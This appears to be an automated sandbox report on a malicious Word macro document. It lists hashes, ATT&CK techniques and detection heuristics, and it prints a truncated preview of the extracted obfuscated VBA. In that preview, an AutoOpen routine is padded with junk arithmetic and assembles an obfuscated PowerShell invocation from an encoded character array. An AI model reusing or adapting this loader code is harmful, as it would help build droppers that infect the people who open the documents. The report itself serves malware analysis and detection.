Office (OLE) malware analysis — malicious · 4b0d67d68a8feb66

MALICIOUS

Office (OLE)

230.0 KB Created: 2018-07-06 19:48:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 0ded1e121234d69958f96b0801801a0a SHA-1: f0f2bd2bd29ecf27e4d14e3ec7b4e8017a1ee821 SHA-256: 4b0d67d68a8feb662b08bd902fe0123571db5cd7b7fc94644621dddc1ac809de

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing an obfuscated VBA macro with an AutoOpen subroutine. This macro utilizes `CreateObject` and `Shell()` calls, indicating an intent to execute arbitrary code, likely to download and run a second-stage payload. ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6603019-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6603019-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12290 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12290 bytes
SHA-256: `3ee84dda51f690a8ccc24d83560d9894a2d7b9792b372c4911b762536990f8dc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HhzldHODWKFLT" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next kAPDjd = XSDjm / WJAzK - (66355 * NjvkV - 86950 * XnnhrT + (APDuh + FqNHuw * pLQKOi * XDEihq)) DznQG = MwpYp / VcQll - (30132 * PqZVw - 71708 * FDIBX + (LXzdaq + ZPtCYZ * QpDJX * Njdii)) jDHnb = aIttIZ / McCkwC - (5468 * zONSO - 98715 * owLEYT + (QGcYrX + nmzHc * XhYsIw * iptVM)) UviEBX = MwHaKi / KbNKlz - (51466 * aSvcL - 84284 * MHLGvC + (EvGENL + QSzRcX * fLbkB * UQIYM)) uAIqoA = LzcnKv / hzwWz - (44363 * vQAwd - 2556 * iuVzjL + (YGCOXf + TNQzb * fjjHhU * zkIrK)) iVoTpW = zDdjOX / opXGA - (23337 * cTNsC - 94436 * YMrMK + (ilFiw + RSGlv * AjQpJ * miLCCb)) ETGoB = LKFjuY / Oiili - (37928 * nAPVKX - 64426 * DdUajO + (twdXSc + akOVUz * LBwio * DEkdiG)) ZiZqmX = QkDks / huEVi - (35551 * BNvjDH - 48664 * ujjiEI + (itQzYI + zNERZF * HjUItl * nqniz)) wqrAfwuw (SjrTiqKDnDZ + qjpbuJlcmji + SJVEDDHI) OTsCTo = IKBLra / HpCjqs - (52766 * wrhro - 25618 * tMLpwV + (dSiQfs + ccqdad * cWaOBq * AVcAS)) pjmCKA = ShlBLv / iYXkZ - (58847 * TrSncc - 70690 * mOPWo + (tGPqAT + WzdDrR * bcdAA * WrTPh)) pzBbI = MjEZN / mUPqNN - (68106 * Rplbz - 59216 * czCPM + (UmdpBS + csRAB * EDliO * jwAAOa)) End Sub Attribute VB_Name = "wuXloGqpS" Function SjrTiqKDnDZ() On Error Resume Next VFUnhi = AwEnJX * busTYC - zwlwi / 35955 - (jpQSvL + uLKMR / (ZTXzW * FVKAt)) XWHirw = wUHoV * LUjjh - GChfa / 76985 - (JMPWo + Cwown / (TOFBFM * cHNlob)) Jvprju = oziwS * SSXVt - OsBBc / 36431 - (LRwbbv + jtAwH / (hBZGS * tRKpp)) jIAWzUIWd = "wershe" + "ll " + " " + " " + " & " + Chr(40) + " $eNv:" + "COMSPEC[4" + ",24,25]-" + "jOiN''" + Chr(41) + " " EvIuN = pjAsX * DzjYR - NmZNS / 89907 - (UZaBcG + fbQol / (ljRwB * iKEvil)) BItrc = MswPi * mLcbh - nLniUb / 23397 - (LXQdsP + pJXhY / (YuskC * duWic)) RWTsuKmzCs = Chr(40) + "[STrI" + "NG]::" + "JoIn" + Chr(40) + " ''" + " , " + Chr(40) + " " + "'114}56S" + "28z38" + "m107Q56" + "Q51m33G" + "123G57z" + "52~6" + "0G51" + "~53Q34" MdXnRf = BocVXS * wCFtI - PRuuSL / 66351 - (opnPFQ + LmjQtU / (FQPfz * zUdiF)) FuNBL = "}118" + "z24}51G" + "34z120" + "-1z51%52" + "S21,58" + "~63~5" + "1G56-34-" + "109-114" + "~27S53" rTjjIw = cWbht * PGGJLt - zDSjqj / 19696 - (jiYIs + dSqHcq / (JlNOFR * zPZOS)) jcVGwA = woFRB * lPVdPP - LifnOX / 87066 - (LEKBh + cJNJwU / (HbJNw * MEHFpo)) EwisZG = mjuPTc * FITTu - ECWZSm / 63105 - (EzVNr + XMfRX / (RUrOz * IDzzlW)) iCaIZ = ZdikZB * NlsdBv - RjKHcp / 58058 - (QFOwUj + VmWrkn / (mHpvzv * GVjaM)) maLaCbY = "G52z" + "107z113-" + "62}34S3" + "4m38" + "-108}121" + "-121%33" + "m33z33-1" + "20m37" + "Q55z51-" + "61-55" + "-36z3" + "5m56m" ijFNdG = lCUdM * OEHoDq - aZPDp / 59374 - (vPPsfn + UwYXMh / (PuMfYt * wHEmTS)) BztZmC = rCYApm * QBjCBn - ESkRH / 21216 - (FJpfq + QqOCEZ / (tKpFc * KwXfQ)) WzhIH = rZmtjV * wXanjw - WYtcfp / 83798 - (VidZS + RTIFvY / (rHRGjd * mYkzR)) zEFcRn = DEQJCU * EShkZu - RcWwMa / 25907 - (wiHiqU + Dddlq / (DBwjJk * FCOspK)) ZVwthU = "63~55" + "}53%51~5" + "9Q51S" + "36%58" + "G55z56z" + "49G1" + "20G53S57" kPopS = VPJCQ * usdiH - wtlkQ / 99425 - (OFikXD + wXpJl / (jbWCs * oIORh)) BYwPK = nbzYB * HiQqIQ - iDYQl / 330 - (ILGMUm + jXzOS / (tHkhzs * qZnvKC)) McHNON = bVlEP * bKQcpd - XTrRs / 6510 - (jXLBR + jTusAD / (ffOvu * NPOWSU)) HtlpU = HiEJj * SCIQYc - EmrEvW / 30915 - (rVBtjs + ZZJCf / (SBbELI * KGzzp)) kYcoin = "%59%121," + "32-19,34," + "55z37,62" + "Q102S1" + "8z1%" + "121~22-62" + "m34S34" tojzzo = Ewqfm * NFWDTw - lVXisr / 22168 - (AozLja + JnpKw / (fcfXG * aDrON)) qYRAH = ddEKt * FYDvj - IAZGs / 82932 - (lTkYI + jkdjl / (niDSla * mEBAX)) vVSwAYiv = "~38Q108S" + "121S" + "121S33S3" + "3G33~120}" + "37m62" + "G57," + "38m1" + "23}33," Faikf = pWnsEv * JicoSE - fFhnfb / 8905 - (kTNQA + iJzzG / (zMPaj * jcVYLF)) jNpsizrB ... (truncated)

SHA-256: 3ee84dda51f690a8ccc24d83560d9894a2d7b9792b372c4911b762536990f8dc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HhzldHODWKFLT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   kAPDjd = XSDjm / WJAzK - (66355 * NjvkV - 86950 * XnnhrT + (APDuh + FqNHuw * pLQKOi * XDEihq))
   DznQG = MwpYp / VcQll - (30132 * PqZVw - 71708 * FDIBX + (LXzdaq + ZPtCYZ * QpDJX * Njdii))
   jDHnb = aIttIZ / McCkwC - (5468 * zONSO - 98715 * owLEYT + (QGcYrX + nmzHc * XhYsIw * iptVM))
   UviEBX = MwHaKi / KbNKlz - (51466 * aSvcL - 84284 * MHLGvC + (EvGENL + QSzRcX * fLbkB * UQIYM))
   uAIqoA = LzcnKv / hzwWz - (44363 * vQAwd - 2556 * iuVzjL + (YGCOXf + TNQzb * fjjHhU * zkIrK))
   iVoTpW = zDdjOX / opXGA - (23337 * cTNsC - 94436 * YMrMK + (ilFiw + RSGlv * AjQpJ * miLCCb))
   ETGoB = LKFjuY / Oiili - (37928 * nAPVKX - 64426 * DdUajO + (twdXSc + akOVUz * LBwio * DEkdiG))
   ZiZqmX = QkDks / huEVi - (35551 * BNvjDH - 48664 * ujjiEI + (itQzYI + zNERZF * HjUItl * nqniz))
wqrAfwuw (SjrTiqKDnDZ + qjpbuJlcmji + SJVEDDHI)
   OTsCTo = IKBLra / HpCjqs - (52766 * wrhro - 25618 * tMLpwV + (dSiQfs + ccqdad * cWaOBq * AVcAS))
   pjmCKA = ShlBLv / iYXkZ - (58847 * TrSncc - 70690 * mOPWo + (tGPqAT + WzdDrR * bcdAA * WrTPh))
   pzBbI = MjEZN / mUPqNN - (68106 * Rplbz - 59216 * czCPM + (UmdpBS + csRAB * EDliO * jwAAOa))
End Sub


Attribute VB_Name = "wuXloGqpS"
Function SjrTiqKDnDZ()
On Error Resume Next
VFUnhi = AwEnJX * busTYC - zwlwi / 35955 - (jpQSvL + uLKMR / (ZTXzW * FVKAt))
   XWHirw = wUHoV * LUjjh - GChfa / 76985 - (JMPWo + Cwown / (TOFBFM * cHNlob))
   Jvprju = oziwS * SSXVt - OsBBc / 36431 - (LRwbbv + jtAwH / (hBZGS * tRKpp))
jIAWzUIWd = "wershe" + "ll   " + "      " + "       " + "  & " + Chr(40) + " $eNv:" + "COMSPEC[4" + ",24,25]-" + "jOiN''" + Chr(41) + " "
EvIuN = pjAsX * DzjYR - NmZNS / 89907 - (UZaBcG + fbQol / (ljRwB * iKEvil))
   BItrc = MswPi * mLcbh - nLniUb / 23397 - (LXQdsP + pJXhY / (YuskC * duWic))
RWTsuKmzCs = Chr(40) + "[STrI" + "NG]::" + "JoIn" + Chr(40) + " ''" + " , " + Chr(40) + " " + "'114}56S" + "28z38" + "m107Q56" + "Q51m33G" + "123G57z" + "52~6" + "0G51" + "~53Q34"
MdXnRf = BocVXS * wCFtI - PRuuSL / 66351 - (opnPFQ + LmjQtU / (FQPfz * zUdiF))
FuNBL = "}118" + "z24}51G" + "34z120" + "-1z51%52" + "S21,58" + "~63~5" + "1G56-34-" + "109-114" + "~27S53"
rTjjIw = cWbht * PGGJLt - zDSjqj / 19696 - (jiYIs + dSqHcq / (JlNOFR * zPZOS))
   jcVGwA = woFRB * lPVdPP - LifnOX / 87066 - (LEKBh + cJNJwU / (HbJNw * MEHFpo))
   EwisZG = mjuPTc * FITTu - ECWZSm / 63105 - (EzVNr + XMfRX / (RUrOz * IDzzlW))
   iCaIZ = ZdikZB * NlsdBv - RjKHcp / 58058 - (QFOwUj + VmWrkn / (mHpvzv * GVjaM))
maLaCbY = "G52z" + "107z113-" + "62}34S3" + "4m38" + "-108}121" + "-121%33" + "m33z33-1" + "20m37" + "Q55z51-" + "61-55" + "-36z3" + "5m56m"
ijFNdG = lCUdM * OEHoDq - aZPDp / 59374 - (vPPsfn + UwYXMh / (PuMfYt * wHEmTS))
   BztZmC = rCYApm * QBjCBn - ESkRH / 21216 - (FJpfq + QqOCEZ / (tKpFc * KwXfQ))
   WzhIH = rZmtjV * wXanjw - WYtcfp / 83798 - (VidZS + RTIFvY / (rHRGjd * mYkzR))
   zEFcRn = DEQJCU * EShkZu - RcWwMa / 25907 - (wiHiqU + Dddlq / (DBwjJk * FCOspK))
ZVwthU = "63~55" + "}53%51~5" + "9Q51S" + "36%58" + "G55z56z" + "49G1" + "20G53S57"
kPopS = VPJCQ * usdiH - wtlkQ / 99425 - (OFikXD + wXpJl / (jbWCs * oIORh))
   BYwPK = nbzYB * HiQqIQ - iDYQl / 330 - (ILGMUm + jXzOS / (tHkhzs * qZnvKC))
   McHNON = bVlEP * bKQcpd - XTrRs / 6510 - (jXLBR + jTusAD / (ffOvu * NPOWSU))
   HtlpU = HiEJj * SCIQYc - EmrEvW / 30915 - (rVBtjs + ZZJCf / (SBbELI * KGzzp))
kYcoin = "%59%121," + "32-19,34," + "55z37,62" + "Q102S1" + "8z1%" + "121~22-62" + "m34S34"
tojzzo = Ewqfm * NFWDTw - lVXisr / 22168 - (AozLja + JnpKw / (fcfXG * aDrON))
   qYRAH = ddEKt * FYDvj - IAZGs / 82932 - (lTkYI + jkdjl / (niDSla * mEBAX))
vVSwAYiv = "~38Q108S" + "121S" + "121S33S3" + "3G33~120}" + "37m62" + "G57," + "38m1" + "23}33,"
Faikf = pWnsEv * JicoSE - fFhnfb / 8905 - (kTNQA + iJzzG / (zMPaj * jcVYLF))
jNpsizrB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.